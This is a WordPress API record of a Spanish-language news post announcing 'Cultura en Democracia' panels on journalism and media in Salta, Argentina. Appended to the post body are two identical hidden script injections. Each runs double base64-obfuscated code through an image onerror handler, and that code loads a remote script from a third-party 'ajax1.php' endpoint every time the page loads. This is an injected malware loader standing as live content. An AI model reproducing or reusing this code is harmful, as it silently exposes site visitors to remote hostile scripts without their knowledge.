{"id":2772,"date":"2023-06-26T10:12:18","date_gmt":"2023-06-26T13:12:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2772"},"modified":"2025-08-14T00:14:17","modified_gmt":"2025-08-14T03:14:17","slug":"cultura-en-democracia-mesas-de-intercambio-y-debate-en-el-centro-cultural-america","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2772","title":{"rendered":"Cultura en Democracia: Mesas de intercambio y debate en el Centro Cultural Am\u00e9rica"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b51039\"><em>\u201cPeriodismo, Medios de Comunicaci\u00f3n y Democracia\u201d son las tem\u00e1ticas que se abordar\u00e1n desde las actividades planificadas para el mes de junio.<\/em><\/h3>\n\n\n\n<p>Desde hoy&nbsp;26 hasta el&nbsp;&nbsp;29 de junio se desarrollar\u00e1n Mesas de intercambio y debate vinculadas al ciclo Periodismo, Medios de Comunicaci\u00f3n y Democracia, el cual se desarrolla en el marco del programa&nbsp;<strong>Cultura en Democracia<\/strong>. Las mismas se concretar\u00e1n en el Sal\u00f3n Blanco del Centro Cultural Am\u00e9rica, Mitre 23.<\/p>\n\n\n\n<p>Los \u00faltimos 40 a\u00f1os fueron signados por una aceleraci\u00f3n in\u00e9dita en los modos y maneras de ejercer la tarea period\u00edstica. Los paneles buscan reflexionar sobre c\u00f3mo afectaron estos cambios t\u00e9cnicos en el modo y la manera de hacer periodismo, el papel de los medios en la construcci\u00f3n de la opini\u00f3n p\u00fablica y la relaci\u00f3n entre medios y poder pol\u00edtico.<\/p>\n\n\n\n<p>Cultura en Democracia propone fomentar y fortalecer pr\u00e1cticas culturales diversas, participativas, federales en el marco de los 40 a\u00f1os de democracia, abriendo canales que posibiliten la reflexi\u00f3n de diferentes aspectos y desaf\u00edos de la vida contempor\u00e1nea.<\/p>\n\n\n\n<p><strong>Cronograma<\/strong><\/p>\n\n\n\n<p><strong>Lunes 26 de junio<\/strong><\/p>\n\n\n\n<p>17, muestra de cortos \u201c40 a\u00f1os de democracia\u201d. T y P Cine y Video\/ LAPAE.<\/p>\n\n\n\n<p>Coordina: Ana Echenique<\/p>\n\n\n\n<p>20, \u201cToca bot\u00f3n Periodismo digital en Salta: entre la pandemia, la inteligencia colectiva y la inteligencia artificial\u201d.<\/p>\n\n\n\n<p>Participan: Aimetta Fedra, Grabosky Sergio, Andrea Ju\u00e1rez, Camila Venegas S\u00e1nchez.<\/p>\n\n\n\n<p>Proyecto CIUNSA N\u00b0 2766 (Nuevas Narrativas: Lo Digital y lo Transmedia en<\/p>\n\n\n\n<p>Periodismo en Salta Capital)<\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 28 de Junio<\/strong><\/p>\n\n\n\n<p>19, \u201cLos medios salte\u00f1os y su rol en democracia\u201d.<\/p>\n\n\n\n<p>Participan: Anal\u00eda Machuca, Gustavo Iovino, Paula Poma, Nahuel Toledo, H\u00e9ctor Al\u00ed. Modera: Ana L\u00eda Parodi<\/p>\n\n\n\n<p><strong>Jueves 29 de Junio<\/strong><\/p>\n\n\n\n<p>17, \u201cEl impacto del I.A. en las Comunicaciones\u201d. Organiza Asociaci\u00f3n de Profesionales de la Comunicaci\u00f3n, A.PRO.COM.<\/p>\n\n\n\n<p>Participan: Antonio Tita, Gustavo Alarc\u00f3n, Joaqu\u00edn Sarmiento Barbieri.<\/p>\n\n\n\n<p>19 h, \u201cLas nuevas formas de comunicar\u201d.<\/p>\n\n\n\n<p>Participan: Maira L\u00f3pez, Facundo Sag\u00e1rnaga, Rodrigo S\u00e1nchez. Modera: Nicol\u00e1s Hirtz<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/cultura-en-democracia-mesas-de-intercambio-y-debate-en-el-centro-cultural-america-90321\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cPeriodismo, Medios de Comunicaci\u00f3n y Democracia\u201d son las tem\u00e1ticas que se abordar\u00e1n desde las actividades planificadas para el mes de junio. Desde hoy&nbsp;26 hasta el&nbsp;&nbsp;29 de junio se desarrollar\u00e1n Mesas de intercambio y debate vinculadas al ciclo Periodismo, Medios de Comunicaci\u00f3n y Democracia, el cual se desarrolla en el marco del programa&nbsp;Cultura en Democracia. Las [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2773,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-2772","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2772"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2772"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2772\/revisions"}],"predecessor-version":[{"id":7047,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2772\/revisions\/7047"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2773"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2772"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2772"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2772"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}